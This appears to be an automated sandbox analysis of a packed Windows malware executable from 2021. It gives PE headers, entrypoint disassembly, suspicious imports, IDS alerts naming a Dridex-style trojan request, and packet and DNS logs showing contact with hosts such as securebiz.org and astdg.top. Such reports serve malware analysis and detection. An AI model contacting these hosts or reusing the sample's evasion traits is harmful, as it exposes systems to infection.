                                                                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................................PE..L...y.h^...

                                                                                                                                                                            File Icon

                                                                                                                                                                            Icon Hash:c6cefee6e7c4c4f1

                                                                                                                                                                            Static PE Info

                                                                                                                                                                            General

                                                                                                                                                                            Entrypoint:0x496776
                                                                                                                                                                            Entrypoint Section:.text
                                                                                                                                                                            Digitally signed:false
                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                            Subsystem:windows gui
                                                                                                                                                                            Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
                                                                                                                                                                            DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                                                                            Time Stamp:0x5E68C679 [Wed Mar 11 11:07:37 2020 UTC]
                                                                                                                                                                            TLS Callbacks:
                                                                                                                                                                            CLR (.Net) Version:
                                                                                                                                                                            OS Version Major:5
                                                                                                                                                                            OS Version Minor:0
                                                                                                                                                                            File Version Major:5
                                                                                                                                                                            File Version Minor:0
                                                                                                                                                                            Subsystem Version Major:5
                                                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                                                            Import Hash:ecc36f6be970cd1f60fff6968abb9451

                                                                                                                                                                            Entrypoint Preview

                                                                                                                                                                            Instruction
                                                                                                                                                                            call 00007FC8E4966D4Eh
                                                                                                                                                                            jmp 00007FC8E496175Eh
                                                                                                                                                                            mov ecx, dword ptr [esp+04h]
                                                                                                                                                                            test ecx, 00000003h
                                                                                                                                                                            je 00007FC8E4961906h
                                                                                                                                                                            mov al, byte ptr [ecx]
                                                                                                                                                                            add ecx, 01h
                                                                                                                                                                            test al, al
                                                                                                                                                                            je 00007FC8E4961930h
                                                                                                                                                                            test ecx, 00000003h
                                                                                                                                                                            jne 00007FC8E49618D1h
                                                                                                                                                                            add eax, 00000000h
                                                                                                                                                                            lea esp, dword ptr [esp+00000000h]
                                                                                                                                                                            lea esp, dword ptr [esp+00000000h]
                                                                                                                                                                            mov eax, dword ptr [ecx]
                                                                                                                                                                            mov edx, 7EFEFEFFh
                                                                                                                                                                            add edx, eax
                                                                                                                                                                            xor eax, FFFFFFFFh
                                                                                                                                                                            xor eax, edx
                                                                                                                                                                            add ecx, 04h
                                                                                                                                                                            test eax, 81010100h
                                                                                                                                                                            je 00007FC8E49618CAh
                                                                                                                                                                            mov eax, dword ptr [ecx-04h]
                                                                                                                                                                            test al, al
                                                                                                                                                                            je 00007FC8E4961914h
                                                                                                                                                                            test ah, ah
                                                                                                                                                                            je 00007FC8E4961906h
                                                                                                                                                                            test eax, 00FF0000h
                                                                                                                                                                            je 00007FC8E49618F5h
                                                                                                                                                                            test eax, FF000000h
                                                                                                                                                                            je 00007FC8E49618E4h
                                                                                                                                                                            jmp 00007FC8E49618AFh
                                                                                                                                                                            lea eax, dword ptr [ecx-01h]
                                                                                                                                                                            mov ecx, dword ptr [esp+04h]
                                                                                                                                                                            sub eax, ecx
                                                                                                                                                                            ret
                                                                                                                                                                            lea eax, dword ptr [ecx-02h]
                                                                                                                                                                            mov ecx, dword ptr [esp+04h]
                                                                                                                                                                            sub eax, ecx
                                                                                                                                                                            ret
                                                                                                                                                                            lea eax, dword ptr [ecx-03h]
                                                                                                                                                                            mov ecx, dword ptr [esp+04h]
                                                                                                                                                                            sub eax, ecx
                                                                                                                                                                            ret
                                                                                                                                                                            lea eax, dword ptr [ecx-04h]
                                                                                                                                                                            mov ecx, dword ptr [esp+04h]
                                                                                                                                                                            sub eax, ecx
                                                                                                                                                                            ret
                                                                                                                                                                            cmp ecx, dword ptr [004A7314h]
                                                                                                                                                                            jne 00007FC8E49618E4h
                                                                                                                                                                            rep ret
                                                                                                                                                                            jmp 00007FC8E4966D45h
                                                                                                                                                                            push eax
                                                                                                                                                                            push dword ptr fs:[00000000h]
                                                                                                                                                                            lea eax, dword ptr [esp+0Ch]
                                                                                                                                                                            sub esp, dword ptr [esp+0Ch]
                                                                                                                                                                            push ebx
                                                                                                                                                                            push esi
                                                                                                                                                                            push edi
                                                                                                                                                                            mov dword ptr [eax], ebp
                                                                                                                                                                            mov ebp, eax
                                                                                                                                                                            mov eax, dword ptr [004A7314h]
                                                                                                                                                                            xor eax, ebp
                                                                                                                                                                            push eax
                                                                                                                                                                            push dword ptr [ebp-04h]
                                                                                                                                                                            mov dword ptr [ebp+00h], 00000000h

                                                                                                                                                                            Data Directories

                                                                                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0xa3cb00x70.text
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0xa302c0x3c.text
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x28df0000xcf68.rsrc
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x12700x1c.text
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x30400x40.text
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x10000x220.text
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                            Sections

                                                                                                                                                                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                            .text0x10000xa2d200xa2e00False0.955169560629data7.96614983128IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                                                                            .data0xa40000x283a0a40x5600unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                                                            .rsrc0x28df0000xcf680xd000False0.714242788462data6.67255492213IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                                                            Resources

                                                                                                                                                                            NameRVASizeTypeLanguageCountry
                                                                                                                                                                            RT_CURSOR0x28eb8180x130data
                                                                                                                                                                            RT_ICON0x28df5100xea8dataCroatianCroatia
                                                                                                                                                                            RT_ICON0x28e03b80x8a8dataCroatianCroatia
                                                                                                                                                                            RT_ICON0x28e0c600x568GLS_BINARY_LSB_FIRSTCroatianCroatia
                                                                                                                                                                            RT_ICON0x28e11c80x25a8dBase III DBT, version number 0, next free block index 40CroatianCroatia
                                                                                                                                                                            RT_ICON0x28e37700x10a8dataCroatianCroatia
                                                                                                                                                                            RT_ICON0x28e48180x988dataCroatianCroatia
                                                                                                                                                                            RT_ICON0x28e51a00x468GLS_BINARY_LSB_FIRSTCroatianCroatia
                                                                                                                                                                            RT_ICON0x28e56700xea8dataCroatianCroatia
                                                                                                                                                                            RT_ICON0x28e65180x8a8dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 328966, next used block 13534290CroatianCroatia
                                                                                                                                                                            RT_ICON0x28e6dc00x568GLS_BINARY_LSB_FIRSTCroatianCroatia
                                                                                                                                                                            RT_ICON0x28e73280x25a8dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 217771467, next used block 183759557CroatianCroatia
                                                                                                                                                                            RT_ICON0x28e98d00x10a8dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 228999981, next used block 11745314CroatianCroatia
                                                                                                                                                                            RT_ICON0x28ea9780x988dataCroatianCroatia
                                                                                                                                                                            RT_ICON0x28eb3000x468GLS_BINARY_LSB_FIRSTCroatianCroatia
                                                                                                                                                                            RT_STRING0x28ebb180x258dataCroatianCroatia
                                                                                                                                                                            RT_STRING0x28ebd700x1f8dataCroatianCroatia
                                                                                                                                                                            RT_ACCELERATOR0x28eb7d00x38dataCroatianCroatia
                                                                                                                                                                            RT_ACCELERATOR0x28eb8080x10dataCroatianCroatia
                                                                                                                                                                            RT_GROUP_CURSOR0x28eb9480x14data
                                                                                                                                                                            RT_GROUP_ICON0x28e56080x68dataCroatianCroatia
                                                                                                                                                                            RT_GROUP_ICON0x28eb7680x68dataCroatianCroatia
                                                                                                                                                                            RT_VERSION0x28eb9600x1b4data

                                                                                                                                                                            Imports

                                                                                                                                                                            DLLImport
                                                                                                                                                                            KERNEL32.dllLeaveCriticalSection, GetConsoleAliasesLengthA, InterlockedExchangeAdd, CreateTapePartition, GetSystemDefaultLCID, CreateActCtxA, GetCPInfoExW, WriteConsoleInputW, ReadConsoleInputW, InitializeSListHead, SetConsoleDisplayMode, WriteConsoleA, GetConsoleCP, VerifyVersionInfoW, CreateFileW, WritePrivateProfileSectionW, GetPrivateProfileSectionA, EnumDateFormatsExA, DeleteTimerQueue, LoadLibraryA, FlushInstructionCache, SetConsoleCP, FindFirstVolumeW, ReadFile, BuildCommDCBW, VerLanguageNameW, SetFileApisToANSI, WriteProcessMemory, SetEvent, GetExitCodeThread, EndUpdateResourceW, GetCPInfoExA, SetLastError, UpdateResourceA, SetConsoleTitleW, FindClose, LoadLibraryExA, CopyFileW, ReadConsoleA, ZombifyActCtx, AddRefActCtx, HeapUnlock, DnsHostnameToComputerNameW, ReadConsoleOutputW, GlobalFindAtomW, GetSystemWindowsDirectoryW, GetUserDefaultLCID, BuildCommDCBAndTimeoutsA, CommConfigDialogA, GetFileAttributesW, IsWow64Process, UnmapViewOfFile, GetAtomNameW, HeapSize, GetGeoInfoA, GetCurrentProcess, VirtualProtect, GetProcAddress, GetModuleHandleA, CreateThread, GetVersionExW, GetProcessAffinityMask, WaitForSingleObject, SetConsoleCursorPosition, VerifyVersionInfoA, lstrlenA, WriteConsoleOutputCharacterA, GetFileAttributesExA, GetComputerNameA, CommConfigDialogW, GetConsoleAliasA, GetSystemTimeAsFileTime, GetDiskFreeSpaceW, RaiseException, RtlUnwind, GetLastError, HeapReAlloc, HeapAlloc, GetStartupInfoW, HeapFree, TerminateProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, GetModuleHandleW, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, GetCurrentThreadId, InterlockedDecrement, SetHandleCount, GetStdHandle, GetFileType, GetStartupInfoA, DeleteCriticalSection, SetFilePointer, EnterCriticalSection, HeapCreate, VirtualFree, VirtualAlloc, Sleep, ExitProcess, WriteFile, GetModuleFileNameA, GetModuleFileNameW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, InitializeCriticalSectionAndSpinCount, SetStdHandle, WideCharToMultiByte, GetConsoleMode, FlushFileBuffers, LCMapStringA, MultiByteToWideChar, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, GetConsoleOutputCP, WriteConsoleW, CloseHandle, CreateFileA
                                                                                                                                                                            USER32.dllGetAltTabInfoW, RealChildWindowFromPoint

                                                                                                                                                                            Exports

                                                                                                                                                                            NameOrdinalAddress
                                                                                                                                                                            @GetOtherVice@1210x49457d
                                                                                                                                                                            @SetFirstEverVice@420x49457a

                                                                                                                                                                            Version Infos

                                                                                                                                                                            DescriptionData
                                                                                                                                                                            InternalNamekogzmuahoke.exi
                                                                                                                                                                            ProductVersion91.78.38.10
                                                                                                                                                                            CopyrightCopyrighz (C) 2020, vodkaguts
                                                                                                                                                                            Translation0x0482 0x011f

                                                                                                                                                                            Possible Origin

                                                                                                                                                                            Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                            CroatianCroatia

                                                                                                                                                                            Network Behavior

                                                                                                                                                                            Snort IDS Alerts

                                                                                                                                                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                                            08/03/21-19:00:13.833047TCP2020826ET TROJAN Potential Dridex.Maldoc Minimal Executable Request4974380192.168.2.4187.170.252.73
                                                                                                                                                                            08/03/21-19:00:21.498381TCP2020826ET TROJAN Potential Dridex.Maldoc Minimal Executable Request4974580192.168.2.431.167.180.141

                                                                                                                                                                            Network Port Distribution

                                                                                                                                                                            TCP Packets

                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                            Aug 3, 2021 19:00:07.015985012 CEST49733443192.168.2.477.123.139.190
                                                                                                                                                                            Aug 3, 2021 19:00:07.056371927 CEST4434973377.123.139.190192.168.2.4
                                                                                                                                                                            Aug 3, 2021 19:00:07.056468964 CEST49733443192.168.2.477.123.139.190
                                                                                                                                                                            Aug 3, 2021 19:00:07.076663017 CEST49733443192.168.2.477.123.139.190
                                                                                                                                                                            Aug 3, 2021 19:00:07.117377043 CEST4434973377.123.139.190192.168.2.4
                                                                                                                                                                            Aug 3, 2021 19:00:07.117408037 CEST4434973377.123.139.190192.168.2.4
                                                                                                                                                                            Aug 3, 2021 19:00:07.117424965 CEST4434973377.123.139.190192.168.2.4
                                                                                                                                                                            Aug 3, 2021 19:00:07.117444038 CEST4434973377.123.139.190192.168.2.4
                                                                                                                                                                            Aug 3, 2021 19:00:07.117461920 CEST49733443192.168.2.477.123.139.190
                                                                                                                                                                            Aug 3, 2021 19:00:07.117497921 CEST49733443192.168.2.477.123.139.190
                                                                                                                                                                            Aug 3, 2021 19:00:07.117503881 CEST49733443192.168.2.477.123.139.190
                                                                                                                                                                            Aug 3, 2021 19:00:07.117945910 CEST4434973377.123.139.190192.168.2.4
                                                                                                                                                                            Aug 3, 2021 19:00:07.117963076 CEST4434973377.123.139.190192.168.2.4
                                                                                                                                                                            Aug 3, 2021 19:00:07.117989063 CEST49733443192.168.2.477.123.139.190
                                                                                                                                                                            Aug 3, 2021 19:00:07.118027925 CEST49733443192.168.2.477.123.139.190
                                                                                                                                                                            Aug 3, 2021 19:00:07.234244108 CEST49733443192.168.2.477.123.139.190
                                                                                                                                                                            Aug 3, 2021 19:00:07.274765968 CEST4434973377.123.139.190192.168.2.4
                                                                                                                                                                            Aug 3, 2021 19:00:07.274944067 CEST49733443192.168.2.477.123.139.190
                                                                                                                                                                            Aug 3, 2021 19:00:07.289275885 CEST49733443192.168.2.477.123.139.190
                                                                                                                                                                            Aug 3, 2021 19:00:07.369590998 CEST4434973377.123.139.190192.168.2.4
                                                                                                                                                                            Aug 3, 2021 19:00:07.493109941 CEST4434973377.123.139.190192.168.2.4
                                                                                                                                                                            Aug 3, 2021 19:00:07.493252039 CEST49733443192.168.2.477.123.139.190
                                                                                                                                                                            Aug 3, 2021 19:00:11.376297951 CEST49733443192.168.2.477.123.139.190
                                                                                                                                                                            Aug 3, 2021 19:00:12.926465988 CEST49741443192.168.2.477.123.139.190
                                                                                                                                                                            Aug 3, 2021 19:00:12.966720104 CEST4434974177.123.139.190192.168.2.4
                                                                                                                                                                            Aug 3, 2021 19:00:12.966829062 CEST49741443192.168.2.477.123.139.190
                                                                                                                                                                            Aug 3, 2021 19:00:12.981764078 CEST49741443192.168.2.477.123.139.190
                                                                                                                                                                            Aug 3, 2021 19:00:13.022362947 CEST4434974177.123.139.190192.168.2.4
                                                                                                                                                                            Aug 3, 2021 19:00:13.022906065 CEST49741443192.168.2.477.123.139.190
                                                                                                                                                                            Aug 3, 2021 19:00:13.022919893 CEST4434974177.123.139.190192.168.2.4
                                                                                                                                                                            Aug 3, 2021 19:00:13.022943974 CEST4434974177.123.139.190192.168.2.4
                                                                                                                                                                            Aug 3, 2021 19:00:13.022958994 CEST4434974177.123.139.190192.168.2.4
                                                                                                                                                                            Aug 3, 2021 19:00:13.022978067 CEST49741443192.168.2.477.123.139.190
                                                                                                                                                                            Aug 3, 2021 19:00:13.022979975 CEST4434974177.123.139.190192.168.2.4
                                                                                                                                                                            Aug 3, 2021 19:00:13.022995949 CEST4434974177.123.139.190192.168.2.4
                                                                                                                                                                            Aug 3, 2021 19:00:13.023009062 CEST49741443192.168.2.477.123.139.190
                                                                                                                                                                            Aug 3, 2021 19:00:13.023041010 CEST49741443192.168.2.477.123.139.190
                                                                                                                                                                            Aug 3, 2021 19:00:13.023062944 CEST49741443192.168.2.477.123.139.190
                                                                                                                                                                            Aug 3, 2021 19:00:13.034239054 CEST49741443192.168.2.477.123.139.190
                                                                                                                                                                            Aug 3, 2021 19:00:13.074553013 CEST4434974177.123.139.190192.168.2.4
                                                                                                                                                                            Aug 3, 2021 19:00:13.074619055 CEST49741443192.168.2.477.123.139.190
                                                                                                                                                                            Aug 3, 2021 19:00:13.087523937 CEST49741443192.168.2.477.123.139.190
                                                                                                                                                                            Aug 3, 2021 19:00:13.131860018 CEST4434974177.123.139.190192.168.2.4
                                                                                                                                                                            Aug 3, 2021 19:00:13.131962061 CEST49741443192.168.2.477.123.139.190
                                                                                                                                                                            Aug 3, 2021 19:00:13.552845955 CEST4974280192.168.2.431.167.180.141
                                                                                                                                                                            Aug 3, 2021 19:00:13.622453928 CEST4974380192.168.2.4187.170.252.73
                                                                                                                                                                            Aug 3, 2021 19:00:13.640341043 CEST804974231.167.180.141192.168.2.4
                                                                                                                                                                            Aug 3, 2021 19:00:13.642168045 CEST4974280192.168.2.431.167.180.141
                                                                                                                                                                            Aug 3, 2021 19:00:13.645867109 CEST4974280192.168.2.431.167.180.141
                                                                                                                                                                            Aug 3, 2021 19:00:13.832283020 CEST8049743187.170.252.73192.168.2.4
                                                                                                                                                                            Aug 3, 2021 19:00:13.832427979 CEST4974380192.168.2.4187.170.252.73
                                                                                                                                                                            Aug 3, 2021 19:00:13.833046913 CEST4974380192.168.2.4187.170.252.73
                                                                                                                                                                            Aug 3, 2021 19:00:13.906989098 CEST804974231.167.180.141192.168.2.4
                                                                                                                                                                            Aug 3, 2021 19:00:13.907238007 CEST804974231.167.180.141192.168.2.4
                                                                                                                                                                            Aug 3, 2021 19:00:13.907485962 CEST4974280192.168.2.431.167.180.141
                                                                                                                                                                            Aug 3, 2021 19:00:13.907500029 CEST4974280192.168.2.431.167.180.141
                                                                                                                                                                            Aug 3, 2021 19:00:13.994779110 CEST804974231.167.180.141192.168.2.4
                                                                                                                                                                            Aug 3, 2021 19:00:14.096313000 CEST8049743187.170.252.73192.168.2.4
                                                                                                                                                                            Aug 3, 2021 19:00:14.616005898 CEST8049743187.170.252.73192.168.2.4
                                                                                                                                                                            Aug 3, 2021 19:00:14.616039991 CEST8049743187.170.252.73192.168.2.4
                                                                                                                                                                            Aug 3, 2021 19:00:14.616065025 CEST8049743187.170.252.73192.168.2.4
                                                                                                                                                                            Aug 3, 2021 19:00:14.616087914 CEST8049743187.170.252.73192.168.2.4
                                                                                                                                                                            Aug 3, 2021 19:00:14.616126060 CEST4974380192.168.2.4187.170.252.73
                                                                                                                                                                            Aug 3, 2021 19:00:14.616168976 CEST4974380192.168.2.4187.170.252.73
                                                                                                                                                                            Aug 3, 2021 19:00:14.856389046 CEST8049743187.170.252.73192.168.2.4
                                                                                                                                                                            Aug 3, 2021 19:00:14.856421947 CEST8049743187.170.252.73192.168.2.4
                                                                                                                                                                            Aug 3, 2021 19:00:14.856447935 CEST8049743187.170.252.73192.168.2.4
                                                                                                                                                                            Aug 3, 2021 19:00:14.856472015 CEST8049743187.170.252.73192.168.2.4
                                                                                                                                                                            Aug 3, 2021 19:00:14.856494904 CEST8049743187.170.252.73192.168.2.4
                                                                                                                                                                            Aug 3, 2021 19:00:14.856517076 CEST8049743187.170.252.73192.168.2.4
                                                                                                                                                                            Aug 3, 2021 19:00:14.856550932 CEST8049743187.170.252.73192.168.2.4
                                                                                                                                                                            Aug 3, 2021 19:00:14.856575012 CEST4974380192.168.2.4187.170.252.73
                                                                                                                                                                            Aug 3, 2021 19:00:14.856575966 CEST8049743187.170.252.73192.168.2.4
                                                                                                                                                                            Aug 3, 2021 19:00:14.856612921 CEST4974380192.168.2.4187.170.252.73
                                                                                                                                                                            Aug 3, 2021 19:00:14.856617928 CEST4974380192.168.2.4187.170.252.73
                                                                                                                                                                            Aug 3, 2021 19:00:14.856627941 CEST4974380192.168.2.4187.170.252.73
                                                                                                                                                                            Aug 3, 2021 19:00:14.943425894 CEST49744443192.168.2.477.123.139.190
                                                                                                                                                                            Aug 3, 2021 19:00:14.983936071 CEST4434974477.123.139.190192.168.2.4
                                                                                                                                                                            Aug 3, 2021 19:00:14.984146118 CEST49744443192.168.2.477.123.139.190
                                                                                                                                                                            Aug 3, 2021 19:00:15.027821064 CEST49744443192.168.2.477.123.139.190
                                                                                                                                                                            Aug 3, 2021 19:00:15.068531990 CEST8049743187.170.252.73192.168.2.4
                                                                                                                                                                            Aug 3, 2021 19:00:15.068569899 CEST8049743187.170.252.73192.168.2.4
                                                                                                                                                                            Aug 3, 2021 19:00:15.068589926 CEST8049743187.170.252.73192.168.2.4
                                                                                                                                                                            Aug 3, 2021 19:00:15.068608046 CEST8049743187.170.252.73192.168.2.4
                                                                                                                                                                            Aug 3, 2021 19:00:15.068625927 CEST8049743187.170.252.73192.168.2.4
                                                                                                                                                                            Aug 3, 2021 19:00:15.068653107 CEST8049743187.170.252.73192.168.2.4
                                                                                                                                                                            Aug 3, 2021 19:00:15.068679094 CEST8049743187.170.252.73192.168.2.4
                                                                                                                                                                            Aug 3, 2021 19:00:15.068701029 CEST8049743187.170.252.73192.168.2.4
                                                                                                                                                                            Aug 3, 2021 19:00:15.068722963 CEST8049743187.170.252.73192.168.2.4
                                                                                                                                                                            Aug 3, 2021 19:00:15.068739891 CEST4974380192.168.2.4187.170.252.73
                                                                                                                                                                            Aug 3, 2021 19:00:15.068744898 CEST8049743187.170.252.73192.168.2.4
                                                                                                                                                                            Aug 3, 2021 19:00:15.068767071 CEST8049743187.170.252.73192.168.2.4
                                                                                                                                                                            Aug 3, 2021 19:00:15.068788052 CEST4974380192.168.2.4187.170.252.73
                                                                                                                                                                            Aug 3, 2021 19:00:15.068789959 CEST4434974477.123.139.190192.168.2.4
                                                                                                                                                                            Aug 3, 2021 19:00:15.068809986 CEST4434974477.123.139.190192.168.2.4
                                                                                                                                                                            Aug 3, 2021 19:00:15.068831921 CEST4974380192.168.2.4187.170.252.73
                                                                                                                                                                            Aug 3, 2021 19:00:15.068834066 CEST4434974477.123.139.190192.168.2.4
                                                                                                                                                                            Aug 3, 2021 19:00:15.068850040 CEST4434974477.123.139.190192.168.2.4
                                                                                                                                                                            Aug 3, 2021 19:00:15.068906069 CEST49744443192.168.2.477.123.139.190
                                                                                                                                                                            Aug 3, 2021 19:00:15.068921089 CEST49744443192.168.2.477.123.139.190

                                                                                                                                                                            UDP Packets

                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                            Aug 3, 2021 18:59:56.103532076 CEST4971453192.168.2.48.8.8.8
                                                                                                                                                                            Aug 3, 2021 18:59:56.139323950 CEST53497148.8.8.8192.168.2.4
                                                                                                                                                                            Aug 3, 2021 18:59:57.872368097 CEST5802853192.168.2.48.8.8.8
                                                                                                                                                                            Aug 3, 2021 18:59:57.915256977 CEST53580288.8.8.8192.168.2.4
                                                                                                                                                                            Aug 3, 2021 18:59:58.897011995 CEST5309753192.168.2.48.8.8.8
                                                                                                                                                                            Aug 3, 2021 18:59:58.921705008 CEST53530978.8.8.8192.168.2.4
                                                                                                                                                                            Aug 3, 2021 18:59:59.996813059 CEST4925753192.168.2.48.8.8.8
                                                                                                                                                                            Aug 3, 2021 19:00:00.024348974 CEST53492578.8.8.8192.168.2.4
                                                                                                                                                                            Aug 3, 2021 19:00:00.680974960 CEST6238953192.168.2.48.8.8.8
                                                                                                                                                                            Aug 3, 2021 19:00:00.708462954 CEST53623898.8.8.8192.168.2.4
                                                                                                                                                                            Aug 3, 2021 19:00:02.055907965 CEST4991053192.168.2.48.8.8.8
                                                                                                                                                                            Aug 3, 2021 19:00:02.081624031 CEST53499108.8.8.8192.168.2.4
                                                                                                                                                                            Aug 3, 2021 19:00:02.749609947 CEST5585453192.168.2.48.8.8.8
                                                                                                                                                                            Aug 3, 2021 19:00:02.781991005 CEST53558548.8.8.8192.168.2.4
                                                                                                                                                                            Aug 3, 2021 19:00:03.466753006 CEST6454953192.168.2.48.8.8.8
                                                                                                                                                                            Aug 3, 2021 19:00:03.494244099 CEST53645498.8.8.8192.168.2.4
                                                                                                                                                                            Aug 3, 2021 19:00:04.200475931 CEST6315353192.168.2.48.8.8.8
                                                                                                                                                                            Aug 3, 2021 19:00:04.263705015 CEST53631538.8.8.8192.168.2.4
                                                                                                                                                                            Aug 3, 2021 19:00:05.199187994 CEST5299153192.168.2.48.8.8.8
                                                                                                                                                                            Aug 3, 2021 19:00:05.266819000 CEST53529918.8.8.8192.168.2.4
                                                                                                                                                                            Aug 3, 2021 19:00:06.052501917 CEST5370053192.168.2.48.8.8.8
                                                                                                                                                                            Aug 3, 2021 19:00:06.086487055 CEST53537008.8.8.8192.168.2.4
                                                                                                                                                                            Aug 3, 2021 19:00:06.953912020 CEST5172653192.168.2.48.8.8.8
                                                                                                                                                                            Aug 3, 2021 19:00:06.988425970 CEST53517268.8.8.8192.168.2.4
                                                                                                                                                                            Aug 3, 2021 19:00:07.131513119 CEST5679453192.168.2.48.8.8.8
                                                                                                                                                                            Aug 3, 2021 19:00:07.158874035 CEST53567948.8.8.8192.168.2.4
                                                                                                                                                                            Aug 3, 2021 19:00:07.757432938 CEST5653453192.168.2.48.8.8.8
                                                                                                                                                                            Aug 3, 2021 19:00:07.782404900 CEST53565348.8.8.8192.168.2.4
                                                                                                                                                                            Aug 3, 2021 19:00:08.478425980 CEST5662753192.168.2.48.8.8.8
                                                                                                                                                                            Aug 3, 2021 19:00:08.503926992 CEST53566278.8.8.8192.168.2.4
                                                                                                                                                                            Aug 3, 2021 19:00:09.159857988 CEST5662153192.168.2.48.8.8.8
                                                                                                                                                                            Aug 3, 2021 19:00:09.185734034 CEST53566218.8.8.8192.168.2.4
                                                                                                                                                                            Aug 3, 2021 19:00:09.975505114 CEST6311653192.168.2.48.8.8.8
                                                                                                                                                                            Aug 3, 2021 19:00:10.012914896 CEST53631168.8.8.8192.168.2.4
                                                                                                                                                                            Aug 3, 2021 19:00:11.597758055 CEST6407853192.168.2.48.8.8.8
                                                                                                                                                                            Aug 3, 2021 19:00:11.626692057 CEST53640788.8.8.8192.168.2.4
                                                                                                                                                                            Aug 3, 2021 19:00:12.391761065 CEST6480153192.168.2.48.8.8.8
                                                                                                                                                                            Aug 3, 2021 19:00:12.417785883 CEST53648018.8.8.8192.168.2.4
                                                                                                                                                                            Aug 3, 2021 19:00:12.867897987 CEST6172153192.168.2.48.8.8.8
                                                                                                                                                                            Aug 3, 2021 19:00:12.903327942 CEST53617218.8.8.8192.168.2.4
                                                                                                                                                                            Aug 3, 2021 19:00:13.340224028 CEST5125553192.168.2.48.8.8.8
                                                                                                                                                                            Aug 3, 2021 19:00:13.346044064 CEST6152253192.168.2.48.8.8.8
                                                                                                                                                                            Aug 3, 2021 19:00:13.550209045 CEST53615228.8.8.8192.168.2.4
                                                                                                                                                                            Aug 3, 2021 19:00:13.610197067 CEST53512558.8.8.8192.168.2.4
                                                                                                                                                                            Aug 3, 2021 19:00:14.876426935 CEST5233753192.168.2.48.8.8.8
                                                                                                                                                                            Aug 3, 2021 19:00:14.912158966 CEST53523378.8.8.8192.168.2.4
                                                                                                                                                                            Aug 3, 2021 19:00:22.707309008 CEST5315753192.168.2.48.8.8.8
                                                                                                                                                                            Aug 3, 2021 19:00:22.735254049 CEST53531578.8.8.8192.168.2.4
                                                                                                                                                                            Aug 3, 2021 19:00:24.072511911 CEST5504653192.168.2.48.8.8.8
                                                                                                                                                                            Aug 3, 2021 19:00:24.098614931 CEST53550468.8.8.8192.168.2.4
                                                                                                                                                                            Aug 3, 2021 19:00:29.201442957 CEST4961253192.168.2.48.8.8.8
                                                                                                                                                                            Aug 3, 2021 19:00:29.237255096 CEST53496128.8.8.8192.168.2.4
                                                                                                                                                                            Aug 3, 2021 19:00:49.528867006 CEST4928553192.168.2.48.8.8.8
                                                                                                                                                                            Aug 3, 2021 19:00:49.560709000 CEST53492858.8.8.8192.168.2.4

                                                                                                                                                                            DNS Queries

                                                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                            Aug 3, 2021 19:00:06.953912020 CEST192.168.2.48.8.8.80xecc1Standard query (0)api.2ip.uaA (IP address)IN (0x0001)
                                                                                                                                                                            Aug 3, 2021 19:00:12.867897987 CEST192.168.2.48.8.8.80xf581Standard query (0)api.2ip.uaA (IP address)IN (0x0001)
                                                                                                                                                                            Aug 3, 2021 19:00:13.340224028 CEST192.168.2.48.8.8.80x95d1Standard query (0)securebiz.orgA (IP address)IN (0x0001)
                                                                                                                                                                            Aug 3, 2021 19:00:13.346044064 CEST192.168.2.48.8.8.80x105bStandard query (0)astdg.topA (IP address)IN (0x0001)
                                                                                                                                                                            Aug 3, 2021 19:00:14.876426935 CEST192.168.2.48.8.8.80xc162Standard query (0)api.2ip.uaA (IP address)IN (0x0001)
                                                                                                                                                                            Aug 3, 2021 19:00:24.072511911 CEST192.168.2.48.8.8.80xf2eeStandard query (0)api.2ip.uaA (IP address)IN (0x0001)
